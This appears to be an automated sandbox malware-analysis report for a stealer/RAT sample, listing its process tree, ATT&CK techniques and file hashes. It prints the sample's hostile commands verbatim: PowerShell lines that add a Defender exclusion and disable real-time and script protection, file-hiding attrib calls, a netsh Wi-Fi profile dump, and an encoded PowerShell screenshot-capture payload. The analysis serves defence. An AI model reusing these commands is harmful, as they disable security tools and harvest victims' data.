2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exepowershell.execsc.exedescription pid process target process PID 1796 wrote to memory of 3108 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 3108 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 2948 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 2948 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 224 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 224 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 216 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 216 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 2012 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 1796 wrote to memory of 2012 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 1796 wrote to memory of 1604 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 1604 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 1064 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 1064 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 3760 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 3760 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 4948 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 1796 wrote to memory of 4948 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 1796 wrote to memory of 3004 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 3004 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe wmic.exe PID 1796 wrote to memory of 1620 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 1620 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 380 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 380 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe attrib.exe PID 1796 wrote to memory of 2560 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe netsh.exe PID 1796 wrote to memory of 2560 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe netsh.exe PID 1796 wrote to memory of 4584 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 1796 wrote to memory of 4584 1796 2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe powershell.exe PID 4584 wrote to memory of 1636 4584 powershell.exe csc.exe PID 4584 wrote to memory of 1636 4584 powershell.exe csc.exe PID 1636 wrote to memory of 852 1636 csc.exe cvtres.exe PID 1636 wrote to memory of 852 1636 csc.exe cvtres.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 2948 attrib.exe 1620 attrib.exe 380 attrib.exe 3108 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe2⤵
- Views/modifies file attributes
PID:3108
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe2⤵
- Views/modifies file attributes
PID:2948
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024-09-09_23781fcb940954c24ba00db16dbe7457_ngrbot_poet-rat_snatch.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵PID:1604
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name2⤵PID:1064
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4948
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵PID:3004
-
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1620
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:380
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pdgh5hfc\pdgh5hfc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9366.tmp" "c:\Users\Admin\AppData\Local\Temp\pdgh5hfc\CSC819DDCD0652146F5ADD2DFCBFD6EB42.TMP"4⤵PID:852
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD5dfe5d659f29245ce4503daea958a5c0d
SHA16db292c2d3bd0a19a9766db94ba15722678d59d7
SHA256084dda5d3cdff45f17197bd14e7bb89530d3d26024d5452359e93691998d840e
SHA51224d9304234ac5117b00caba50cdb7d8bdedca04f99bd7c2e706c644d75ef951a681ec454b5f25c5bd4522938efddb8a48cfe4e72c77c3a855b6b62c5670bcc3d
-
Filesize
1KB
MD56c55ab885af1a684291034a4087834c5
SHA1b4d4e14a40ece7de94c35fa63444d297ec782ff0
SHA25604f49b4ebfb6f2da41cf147af15a3cf7e6465e8b6a1a1752f40ab14d614ccf35
SHA512d0817a812ae2ca905621c89f41f5676788fac0d932ab9cbc29ab252600d4ffdc3c3ba4f62e5f7d8970b0e2c54ddc7ac9a79d525508d551aabfe6db86266b44d2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
426KB
MD5d8e072991f05969d120fbda2771de51b
SHA11ef7c7938d572eb2e85701277eef35fc2eb6b15e
SHA256e1fb5c562516d8bf08d0733812a211d694333610772aa814718f8ca606bac3f0
SHA512d58ae333e5cc7491c853521c86db4497c8dcfafe4813f437fb7c0e7d81b2c8683949c305dcddf43fa76c384256fb75c306d959b1a84fd35abeadc3466d575c60
-
Filesize
4KB
MD527513ba9779607f84e657429be476150
SHA18dc51c04588fe723877bf9bc5834e25081e7ae37
SHA2567c1954766c4bf1715415088ecccec3eddaf969006f4b6ac0a73e3f5f7a09e7c5
SHA5120dcf364f7ee86c123952ee41b8f13093c39609748385de127650befe52ba6605285e59beb21ef7096b1b6d4ba5a8a7a2e1b274e364a5d94c04ab44b44199649a
-
Filesize
9.9MB
MD523781fcb940954c24ba00db16dbe7457
SHA1e565b0c2b956d023ee1da679f9d98d9966905f59
SHA25662a7ed6c03d5e519cc5121fe8ad967bdadbbda106a3250b03ab50fb10457ed37
SHA5126dce37bd3d8c2b84d74cc83950746430bab67d58327b499a2a63916ce1c352d6e7b01a6d68cde47bd8b950f95987a1fcaffb828af766eb460c2bb099b84c5af4
-
Filesize
2KB
MD56e2386469072b80f18d5722d07afdc0b
SHA1032d13e364833d7276fcab8a5b2759e79182880f
SHA256ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075
SHA512e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb
-
Filesize
652B
MD5b9355c0889db8905af4886dc7739d391
SHA19dd265025d9c09cec2fd0da1bc431a28ac29f406
SHA2565c04b7e4673c3d0995573736821acae518a40b743f26ab849e0292d1038cc67e
SHA5126736f93f513c24005634ff045eaaffe6b25d5eaf7c11ba9e729914d606ba4cc906002c6ce0ded9906cd3df28f734683a3c2e06fcf5c78e088d7d41753e465624
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5b19786a8759022e2e1f0eb802f68ba63
SHA1cc64584909eba505dc03f5fcc3e7ed5975219114
SHA2563c9a8f12c185aa20469325019b7770f60318091014ecafef3d0404b8121bab08
SHA512e3552c98a688c9321f334993c03cb20f671dd5f21b8f052ea4a25db8441291abbb112e968d73459d7efd21fb1c1ad63a33a203b7a8148b6421c83028173ccc18